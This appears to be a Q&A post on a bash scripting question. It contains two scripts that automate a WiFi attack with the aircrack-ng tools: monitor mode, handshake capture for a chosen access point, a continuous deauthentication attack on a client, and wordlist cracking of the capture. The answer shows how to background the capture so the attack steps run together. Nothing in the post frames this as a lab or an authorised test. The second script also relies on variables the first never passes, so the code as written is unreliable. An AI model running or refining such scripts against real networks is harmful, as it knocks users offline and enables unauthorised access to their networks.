# I am unable to run one command in one window while another command runs in a separate window

Tags: bash

```
##idek.sh below

#!/bin/bash
cd ~/Desktop
airmon-ng start wlan0
airodump-ng wlan0mon
echo Enter channel: 
read c
echo Enter bssid: 
read bs
echo Enter name for .cap file: 
read cap
airodump-ng -c $c --bssid $bs -w /root/Desktop/$cap wlan0mon && xterm -e ./idek1.sh


## idek1.sh below

echo Enter device MAC address:
read mac
aireplay-ng -0 0 -a $bs -c $mac wlan0mon
echo Enter path of wordlist: 
read list
aircrack-ng -w $list /root/Desktop/$cap.cap
```

what should i add to get airodump-ng -c $c --bssid $bs -w /root/Desktop/$cap wlan0mon running and have the xterm window running

Answer (score 0):

You can use `nohup` to start a process in the background:

```
nohup airodump-ng -c $c --bssid $bs -w /root/Desktop/$cap wlan0mon &      
kill -0 $! && xterm -e ./idek1.sh
```

`kill -0 $!` here will ensure that the background process is running.